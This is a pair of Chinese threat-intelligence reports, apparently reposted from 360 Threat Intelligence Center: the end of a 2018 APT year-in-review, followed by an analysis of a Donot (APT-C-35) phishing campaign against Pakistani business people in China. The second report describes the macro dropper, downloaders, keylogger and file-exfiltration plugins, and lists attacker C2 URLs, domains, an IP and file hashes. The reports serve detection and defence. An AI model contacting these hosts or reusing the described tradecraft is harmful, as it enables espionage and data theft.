并且在2018年11月左右针对巴基斯坦的攻击中使用了大量InPage漏洞利用文档进行攻击。而InPage则是一个专门针对乌尔都语使用者(巴基斯坦国语)设计的文字处理软件。

image.png

APT38针对全球范围金融机构的攻击事件

评分:危害程度 ★★★★★ 攻击频度 ★★★★ 攻击技术 ★★★★

事件时间:最早于2014年,持续活跃至今

攻击组织:APT38

受害目标:金融机构,银行,ATM,SWIFT

相关攻击武器:多种自制恶意程序

相关漏洞:多种漏洞

攻击入口:鱼叉攻击,水坑攻击

主要攻击战术技术:

1.利用社交网络,搜索等多种方式对攻击目标进行详细的网络侦查

2.使用鱼叉攻击或水坑攻击对目标人员实施攻击并获得初始控制权

3.在目标网络横向移动,最终以获得SWIFT系统终端为目标

4.伪造或修改交易数据达到窃取资金

5.通过格式化硬盘或日志等方式清除痕迹。

APT38被认为是朝鲜来源的APT组织,国外安全厂商通常称为Lazarus Group。近年来主要披露的攻击活动涉及全球金融和银行机构、中美洲在线赌场、以及虚拟电子货币相关的交易所和机构。FireEye在今年披露了一份详细的APT组织报告,并将其中以经济牟利为意图的,针对全球金融、银行机构攻击的威胁活动独立归属为一个新的组织名称,APT38以明确区分其与Lazarus之间的一些不同。

美国司法部在今年9月也公开披露了一份非常详细的针对朝鲜黑客PARK JIN HYOK及其相关组织Chosun Expo过去实施的攻击活动的司法指控。在该报告中指出PARK黑客及其相关组织与过去SONY娱乐攻击事件、全球范围多个银行SWIFT系统被攻击事件、 WannaCry、以及韩国、美国军事人员和机构被攻击的相关事件有关。

APT38,作为目前以经济利益为动机的最为活跃的APT组织,我们也应该持续关注其使用的攻击技术和工具。

image.png

疑似DarkHotel APT组织利用多个IE 0day“双杀”漏洞的定向攻击事件

评分:危害程度 ★★★ 攻击频度 ★★ 攻击技术 ★★★★

事件时间:首次发现于2018年5月,相同Payload在2月中旬被发现

攻击组织:DarkHotel

受害目标:中国

相关攻击武器:劫持操作系统DLL文件(msfte.dll、NTWDBLIB.DLL)的插件式木马后门

相关漏洞:CVE-2018-8174、CVE-2018-8373等

攻击入口:鱼叉邮件攻击

主要攻击战术技术:

1.鱼叉邮件投递包含IE 0day双杀漏洞的Word文档

2.漏洞利用成功后释放白利用文件执行恶意PowerShell下载下一阶段PowerShell脚本

3.下载回来的PowerShell脚本进行Bypass UAC,并通过劫持系统DLL文件下载核心木马模块

4.核心木马模块与C2地址通信下载执行更多的木马插件实现持久化控制

Darkhotel(APT-C-06)是一个长期针对企业高管、国防工业、电子工业等重要机构实施网络间谍攻击活动的APT组织。2018年5月,360公司首次发现疑似该组织使用IE 0day“双杀”漏洞针对中国的定向攻击。

2018年8月15日,网络安全公司趋势科技公开了其在今年7月捕获到的一例在野0day漏洞攻击,经过分析对比发现该0day漏洞和2018年4月360公司首次发现影响IE浏览器并通过Office文档进行攻击的“双杀”漏洞使用了多个相同的攻击技术,极有可能是同一团伙所为。

并且早在2018年2月中旬,360威胁情报中心就跟踪发现了DarkHotel APT团伙使用相同的恶意代码的定向攻击活动,并且结合威胁情报数据挖掘到了该团伙更多的样本,对该团伙近年来使用的多个版本的恶意代码进行了分析对比,梳理了样本演化过程。

image.png

疑似APT33使用Shamoon V3针对中东地区能源企业的定向攻击事件

评分:危害程度 ★★★★ 攻击频度 ★★ 攻击技术 ★★★

事件时间:2018年12月发现

攻击组织:疑似APT33

受害目标:中东和欧洲的石油和天然气公司

相关攻击武器:Shamoon V3

相关漏洞:无

攻击入口:鱼叉邮件攻击

主要攻击战术技术:

1.使用随机生成的数据覆盖系统上的MBR、分区和文件

2.恶意文件的文件描述模仿合法的产品名称

安全人员于今年12月在VirusTotal上发现了新版本的Shamoon恶意代码,其使用随机生成的数据覆盖系统上的MBR,分区和文件。本次攻击活动可能主要针对欧洲和中东的石油、天然气公司。

随后,国外安全厂商McAfee对Shamoon攻击所使用的新的工具集进行分析,并认为新的Shamoon版本作为其攻击工具集的一部分,其还包括一个.Net开发的攻击工具。McAfee指出该攻击活动可能与APT33有关。而后续FireEye对 APT33组织近期的攻击活动与Shamoon攻击的联系也进行了分析说明。

image.png

Slingshot:一个复杂的网络间谍活动

评分:危害程度 ★★★★ 攻击频度 ★★ 攻击技术 ★★★★★

事件时间:2012至2018年2月

攻击组织:疑似针对伊斯兰国和基地组织成员

受害目标:非洲和中东各国的路由器设备

相关攻击武器:自制的攻击武器

相关漏洞:CVE-2007-5633、CVE-2010-1592、CVE-2009-0824

攻击入口:可能通过Windows漏洞利用或已感染的Mikrotik路由器

主要攻击战术技术:

1.初始loader程序将合法的Windows库’scesrv.dll’替换为具有完全相同大小的恶意文件

2.包括内核层的加载器和网络嗅探模块,自定义的文件系统模块

3.可能通过Windows漏洞利用或已感染的Mikrotik路由器获得受害目标的初始控制权。

Slingshot是由卡巴斯基在今年早些发现和披露的网络间谍活动,并且披露其是一个新的、高度复杂的攻击平台的一部分,其在复杂度上可以与Project Sauron和Regin相媲美。

而后续,外媒对该曝光的活动也进行了报道。其中披露该攻击活动可能与美国联合特种作战司令部(JSOC)进行的一项军事计划有关,用于帮助军方和情报界通过感染受害目标常用的计算机收集有关恐怖分子的信息。

卡巴斯基披露Slingshot至少影响了约100名受害者,主要分布于非洲和中东地区国家(如阿富汗、伊拉克、肯尼亚、苏丹、索马里、土耳其等)。其同时针对Windows和Mikrotik路由器平台实施持久性的攻击植入。

image.png

总结

通过360威胁情报中心整理的2018年十大APT攻击事件,我们可以总结出以下一些观点:

工业制造业以及国家基础建设相关的行业和机构越来越多的成为APT组织的直接攻击目标,比如针对乌克兰路由器等IOT设备的VPNFilter恶意代码攻击和针对中东地区能源企业的定向攻击事件;

APT组织通过不断变换攻击方式和更多的0day漏洞来尝试突破目标的安全防护。比如被利用的多个IE 0day双杀漏洞、针对小众的InPage文字处理软件漏洞、针对路由器的漏洞攻击、躲避邮件或终端杀毒软件检测的Office模板注入攻击等;

多个著名的APT团伙在2018年非常活跃,被国内外多个安全研究机构、安全厂商所披露。比如针对欧洲、北美地区进行频繁攻击的APT28,针对东南亚地区持续进行定向攻击的海莲花、蔓灵花等APT组织。

参考链接

[1].https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

[2].https://www.securityweek.com/russia-hacked-olympics-computers-turned-blame-north-korea-report

[3].https://www.justice.gov/opa/press-release/file/1092091/download

[4].https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

[5].https://www.fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html

[6].https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/

[7].https://www.bleepingcomputer.com/news/security/ukraine-says-it-stopped-a-vpnfilter-attack-on-a-chlorine-distillation-station/

[8].https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

[9].https://twitter.com/360TIC/status/1078908533125443584

[10].https://ti.360.net/uploads/2018/07/05/5fc9c36b4cb81d4281599f0d3416931a.pdf

[11].https://ti.360.net/blog/articles/oceanlotus-with-cve-2017-8570/

[12].https://ti.360.net/blog/articles/oceanlotus-targets-chinese-university/

[13].https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/

[14].https://ti.360.net/blog/articles/details-of-apt-c-12-of-operation-nuclearcrisis/

[15].https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/

[16].https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups/

[17].https://ti.360.net/blog/articles/analysis-of-darkhotel/

[18].https://ti.360.net/blog/articles/analysis-of-apt-campaign-bitter/

[19].https://securityaffairs.co/wordpress/72851/apt/vpnfilter-botnet-doj.html

[20].https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/

[21].https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

[22].https://securelist.com/threats-in-the-netherlands/88185/

[23].https://securelist.com/apt-slingshot/84312/

[24].https://blog.talosintelligence.com/2018/05/VPNFilter.html

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

前言

近期,360威胁情报中心协助用户处理了多起非常有针对性的邮件钓鱼攻击事件,被攻击目标包括中国境内的巴基斯坦重要商务人士,该轮攻击活动最早发生在2018年5月,攻击者对目标机器进行了长时间的控制。360威胁情报中心在本文中对本次的钓鱼攻击活动的过程与技术细节进行揭露,希望相关组织和个人能够引起足够重视并采取必要的应对措施。

2017年,360公司发现并披露了主要针对巴基斯坦等南亚地区国家进行网络间谍活动的组织[1],内部跟踪代号为APT-C-35,其后网络安全厂商Arbor公开了该组织的活动并命名为Donot[2]。此APT组织主要针对政府机构等领域进行攻击,以窃取敏感信息为主要目的。从2017年至今,该组织针对巴基斯坦至少发动了4波攻击行动,攻击过程主要是以携带Office漏洞或者恶意宏的鱼叉邮件进行恶意代码的传播,并先后使用了两套独有的恶意代码框架:EHDevel和yty。而在这一波攻击中,Donot团伙瞄准了在我国境内的巴基斯坦商务人士。

钓鱼攻击过程

攻击者针对目标的整个攻击过程如下:

恶意代码分析

360威胁情报中心对整个攻击过程进行了详细分析,过程如下。

Dropper – Excel Macros

攻击者通过向目标邮箱发送带有恶意宏的Excel诱饵文档诱骗目标执行,宏代码成功执行后会在C:\micro释放office_update.exe,并执行该EXE文件。诱饵文档内容为宝马汽车促销的相关信息,这和受害者所从事的商务活动密切相关,极易取得受害者的信任:

Downloader – office_update.exe

文件名 office_update.exe
MD5 2320ca79f627232979314c974e602d3a

office_updata.exe则是一个下载者,其会通过http://bigdata.akamaihub.stream/pushBatch下载一个BAT文件并执行:

该BAT文件主要功能为设置自启动项实现持久化、创建隐藏的文件目录等,office_updata.exe还会从http://bigdata.akamaihub.stream/pushAgent下载文件保存到%USERPROFILE%\BackConfig\BackUp目录下,并命名为wlidsvcc.exe:

office_updata.exe最后会实现自删除:

Plugin-Downloader – wlidsvcc.exe

文件名 wlidsvcc.exe
MD5 68e8c2314c2b1c43709269acd7c8726c

wlidsvcc.exe也是一个下载者,wlidsvcc.exe会与C2通信下载后续需要执行的插件:wuaupdt.exe、kylgr.exe、svchots.exe等等,并启动wuaupdt.exe。样本运行后通过创建互斥量“wlidsvcc”以保证只有一个实例运行:

image.png

随后判断当前进程路径是否为%USERPROFILE%BackConfig\BackUp\wlidsvcc.exe:

image.png

若路径满足条件后,以POST方式与C2:bigdata.akamaihub.stream进行通信,并获取后续的控制指令:

image.png

通过判断C2返回数据,根据不同指令执行不同操作,当指令为“no”时,则Sleep 90秒后再与C2继续通信:

image.png

当命令为“cmdline”时,则启动插件执行器:%USERPROFILE%\BackConfig\BackUp\wuaupdt.exe,并继续与C2通信:

image.png

当指令不是上述两条指令,则从http://bigdata.akamaihub.stream/orderMe下载文件保存到路径C:\Users\%s\BackConfig\BigData,之后继续与C2通信获取需要执行的指令:

image.png

Plugin executor – wuaupdt.exe

文件名 Wuaupdt.exe
MD5 35ec92dbd07f1ca38ec2ed4c4893f7ed

wuaupdt.exe本身的功能是一个CMD后门,其会与C2通信执行一些CMD命令。并且还会通过攻击者下发的指令执行其他的插件,所有后门插件的分析见下节。

通过C2获取指令执行:

image.png

Backdoor – Plugins

wuaupdt.exe会根据攻击者下发的指令执行对应的插件,相关插件分析如下。

Keylogger – Kylgr.exe

文件名 Kylgr.exe
MD5 88f244356fdaddd5087475968d9ac9bf
PDB路径 c:\users\user\documents\visualstudio2010\Projects\newkeylogger\Release\new keylogger.pdb

该插件的主要功能为键盘记录,其首先会在当前目录创建文件inc3++.txt,并检索%USERPROFILE%\Printers\Neighbourhood目录下是否已有历史键盘记录文件存在,若有则将文件名与最后修改时间保存到inc3++.txt:

image.png

image.png

如果%USERPROFILE%\Printers\Neighbourhood路径下有历史键盘记录文件,则将历史键盘记录文件移动到%USERPROFILE%\Printers\Neighbourhood\Spools目录下:

image.png

之后在%USERPROFILE%\Printers\Neighbourhood下创建格式为“用户名_年_月_日(时_分_秒)”的文本文件,用于记录当前的键盘记录,最后循环获取是否有键盘鼠标操作:

image.png

如果获取到窗口名,将窗口名和按键信息保存到创建的文本文件中:

image.png

file-listing – svchots.exe

文件名 svchots.exe
MD5 14eda0837105510da8beba4430615bce

文件搜集插件首先会遍历C、D、E、F、G、H盘:

image.png

并排除以下目录:

image.png

然后获取以下扩展名的文件:

image.png

当找到有以上扩展名的文件后,将文件名与最后的修改日期写入当前目录下的test.txt文件中,并将搜集到的文件加上txt后缀后复制到%USERPROFILE%\Printers\Neighbourhood\Spools目录下:

image.png

Systeminfo – spsvc.exe

文件名 spsvc.exe
MD5 2565215d2bd8b76b4bff00cd52ca81be

系统信息搜集插件使用UPX加壳,脱壳后根据字符串相关信息可以知道是go语言编写的程序。该插件会创建多个CMD进程执行命令,获取系统相关信息,并将获取的信息保存到目录%USERPROFILE%\Printers\Neighbourhood\Spools:

image.png

Uploader – lssm.exe

文件名 lssm.exe
Md5 23386af8fd04c25dcc4fdbbeed68f8d4

文件上传插件主要用于将%USERPROFILE%Printers\Neighbourhood\Spools目录下,由木马收集的敏感信息和文件上传到C2:bigdata.akamaihub.stream

image.png

Uploader – lssmp.exe

文件名 lssmp.exe
MD5 b47386657563c4be9cec0c2f2c5f2f55
数字签名 COMODO CA Limited

和lssm.exe功能类似的另外一个文件上传插件为lssmp.exe,该样本包含数字签名:

image.png

插件执行后会从当前进程列表中找到explorer.exe进程:

image.png

然后获取插件的资源节,并解密出一个PE文件:

image.png

将解密的PE文件注入到explorer.exe执行:

image.png

注入的PE文件在功能与lssm.exe插件一致,上传其他插件收集的键盘信息到C2:

image.png

关联样本分析

360威胁情报中心通过内部大数据关联到此次的攻击团伙使用的其它一些诱饵文档和插件,相关分析如下。

CSD_Promotion_Scheme_2018.xls

文件名 CSD_Promotion_Scheme_2018.xls
MD5 82a5b24fddc40006396f5e1e453dc256

该诱饵文档同样是利用恶意宏的Excel样本,打开文档后会提示启用宏:

image.png

恶意宏代码的主要功能为在%APPDATA%目录下释放Skype.exe,在C:\Skype目录下释放Skype.bat,并执行Skype.bat文件:

image.png

宏代码执行后同样会显示一个宝马汽车促销的相关图片:

image.png

Skyep.bat

Skyep.bat会重新创建%USERPROFILE%Printers\Neighbourhood\Spools、%USERPROFILE%\BackConfig\BackUp和%USERPROFILE%\BackConfig\BigData文件夹,并将这些文件夹属性设置为隐藏:

image.png

该BAT文件还会获取计算机名,将获取到的计算机名和5位随机数字组成字符串保存到%USERPROFILE%\BackConfig\Backup\pcap.txt中:

image.png

并创建多个自启动项,为后续下载执行的插件设置持久化。最后启动Skyep.exe,并删除自身:

image.png

Skyep.exe

文件名 Skyep.exe
MD5 f67595d5176de241538c03be83d8d9a1
PDB C:\Users\spartan\Documents\Visual Studio 2010\Projects\downloader new 22 jun use\downloader\Release\downloader.pdb

Skyep.exe的主要功能为下载执行,文件名则伪装成语音软件Skype,其会从http://databig.akamaihub.stream/pushBatch(还存活)下载文件保存到\BackConfig\BackUp\csrsses.exe并执行,且Skyep.bat文件中已经把该文件写入到自启动项:

image.png

Csrsses.exe

文件名 Csrsses.exe
MD5 e0c0148ca11f988f292f527733e54fca

该样本与前面分析的wlidsvcc.exe功能类似,都是与C2通信获取后续插件执行。

样本主要功能是与C2通信获取后续插件执行,首先从\\BackConfig\\BackUp\\pcap.txt读取出计算机名:

image.png

然后将计算机名封装成字符串:“orderme/计算机名-随机数”,以POST方式与C2:databig.akamaihub.stream进行通信,获取后续命令执行:

image.png

之后通过判断返回网络数据中的Content-Type进行后续操作:如果是“application”,则从C2获取文件保存到\\BackConfig\\BigData\\目录下:

image.png

如果是“cmdline”,则执行\\BackConfig\\BigData\\wuaupdt.exe,并继续与C2通信:

image.png

当等于“batcmd”时,则启动\\BackConfig\\BigData\\test.bat,并且继续与C2通信:

image.png

溯源 – Donot(APT-C-35)

360威胁情报中心通过对此次攻击中使用的宏代码、插件、域名/IP关联分析,以及使用360威胁情报中心分析平台对相关样本和网络基础设施进行拓展,我们确认此次攻击的幕后团伙为Donot APT组织(APT-C-35)。

宏代码相似

2018年3月ASERT曝光的DONOT APT组织[2]的宏利用样本和本次攻击活动中使用的宏利用样本相似度极高,并且都是执行完宏后弹出一个诱饵图片。

image.png

插件相似度

和之前的Donot样本一致,这次的样本也是通过重C&C获取插件执行的插件式木马。其中都有UPX加壳的go语言木马,且代码逻辑高度一致:

image.png

本次攻击活动中的wuaupdt.exe在之前的Donot攻击活动中[1]也曾出现,且C2地址一致。

总结

从本次捕获到的Donot APT攻击活动来看,该APT团伙依然以巴基斯坦相关人士作为首要攻击目标,甚至将攻击范围扩大到包括在华的巴基斯坦人员和机构。种种迹象表明,Donot APT组织(APT-C-35)从未停止自己的攻击活动,或许近期会再次发动新的网络间谍攻击。

360威胁情报中心再次提醒各企业用户,加强员工的安全意识培训是企业信息安全建设中最重要的一环,如有需要,企业用户可以建设态势感知,完善资产管理及持续监控能力,并积极引入威胁情报,以尽可能防御此类攻击。

目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此APT攻击团伙攻击活动的检测。

IOC

MD5
82a5b24fddc40006396f5e1e453dc256
f67595d5176de241538c03be83d8d9a1
e0c0148ca11f988f292f527733e54fca
2320ca79f627232979314c974e602d3a
68e8c2314c2b1c43709269acd7c8726c
35ec92dbd07f1ca38ec2ed4c4893f7ed
88f244356fdaddd5087475968d9ac9bf
14eda0837105510da8beba4430615bce
2565215d2bd8b76b4bff00cd52ca81be
23386af8fd04c25dcc4fdbbeed68f8d4
b47386657563c4be9cec0c2f2c5f2f55
C&C
databig.akamaihub.stream
bigdata.akamaihub.stream
185.236.203.236
unique.fontsupdate.com
PDB路径
C:\Users\spartan\Documents\Visual Studio 2010\Projects\downloader new 22 jun use\downloader\Release\downloader.pdb
C:\users\user\documents\visualstudio2010\Projects\newkeylogger\Release\new keylogger.pdb

参考

https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/

https://asert.arbornetworks.com/donot-team-leverages-new-modular-malware-framework-south-asia/

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM